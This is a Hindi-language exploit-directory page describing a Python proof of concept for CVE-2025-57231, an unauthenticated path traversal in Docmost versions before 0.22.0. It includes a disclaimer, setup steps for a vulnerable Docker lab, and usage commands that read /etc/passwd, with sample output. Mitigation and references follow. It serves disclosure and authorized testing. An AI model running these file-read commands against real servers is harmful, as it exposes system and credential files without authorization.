Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-57231 — CVE-2025-57231 के लिए Python PoC exploit, जो Docmost < 0.22.0 में एक unauthenticated path traversal है जो avatar endpoint के माध्यम से मनमानी फ़ाइलों को पढ़ता है। | Kitploit
उपकरण/GitHubGitHub/anirbala98/cve-2025-57231
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubanirbala98/cve-2025-57231

CVE-2025-57231

CVE-2025-57231 के लिए Python PoC exploit, जो Docmost < 0.22.0 में एक unauthenticated path traversal है जो avatar endpoint के माध्यम से मनमानी फ़ाइलों को पढ़ता है।

रिपॉजिटरी देखें
14घं 20मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-57231 - Docmost < 0.22.0 - मनमाना फ़ाइल पठन

इस रेपो में CVE-2025-57231 के लिए एक Proof of Concept (PoC) एक्सप्लॉइट शामिल है।

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। इसका उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने की आपको अनुमति नहीं है।

अवलोकन

Docmost में एक डायरेक्टरी ट्रैवर्सल भेद्यता संस्करण 0.2.1 से 0.21.0 तक मनमाना फ़ाइल पठन की अनुमति देती है। एप्लिकेशन का /api/attachments/img/avatar एंडपॉइंट फ़ाइल पथों को ठीक से मान्य नहीं करता है और बिना किसी प्रमाणीकरण के सार्वजनिक रूप से सुलभ है। यह अनधिकृत हमलावरों को %2F अनुक्रमों के साथ /avatar एंडपॉइंट की जांच करके लक्ष्य से मनमाना फ़ाइल सामग्री प्राप्त करने की अनुमति देता है।

प्रभावित संस्करण

Docmost के 0.2.1 से 0.21.0 तक के सभी संस्करण प्रभावित हैं।

आवश्यकताएँ

  • Python 3.13.14
  • Requests 2.32.5

भेद्य वातावरण सेटअप

पूर्वापेक्षाएँ: Docker और Docker compose इंस्टॉल होना चाहिए

  1. होम डायरेक्टरी बनाएँ और docker-compose फ़ाइल डाउनलोड करें
root@kitploit:~
mkdir docmost
cd docmost
curl -O https://raw.githubusercontent.com/docmost/docmost/main/docker-compose.yml
  1. docker-compose.yml फ़ाइल संपादित करें
root@kitploit:~
# Generate a long random secret key
openssl rand -hex 32

# Open the docker-compose.yml file and make the following changes:
# 1. Replace `image: docmost/docmost:latest` with `image: docmost/docmost:0.21.0`
# 2. Replace `APP_SECRET` with the random secret key generated above 
  1. कंटेनर प्रारंभ करें
root@kitploit:~
sudo docker-compose up -d
  1. वर्कस्पेस विवरण दर्ज करें

http://localhost:3000/ पर जाएँ और वर्कस्पेस नाम, नाम, ईमेल और पासवर्ड के लिए डमी विवरण दर्ज करें

एक्सप्लॉइट इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2025-57231.git
cd CVE-2025-57231/
pip install -r requirements.txt

उपयोग

root@kitploit:~
python exploit.py <base_url> -f <file location>
python exploit.py http://localhost:3000/ -f /etc/passwd

उदाहरण

root@kitploit:~
└─$ python exploit.py http://localhost:3000/ -f /etc/passwd
[*] Attempting to read arbitrary file

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh

शमन

प्लगइन को संस्करण 0.22.0 में अपग्रेड करें।

संदर्भ

  • https://github.com/advisories/GHSA-59m3-fj8c-996g
  • https://nvd.nist.gov/vuln/detail/CVE-2025-57231
  • https://www.artresilia.com/docmost-v0-21-0-cve-2025-57231-unauthenticated-file-path-traversal
टूल डाउनलोड करें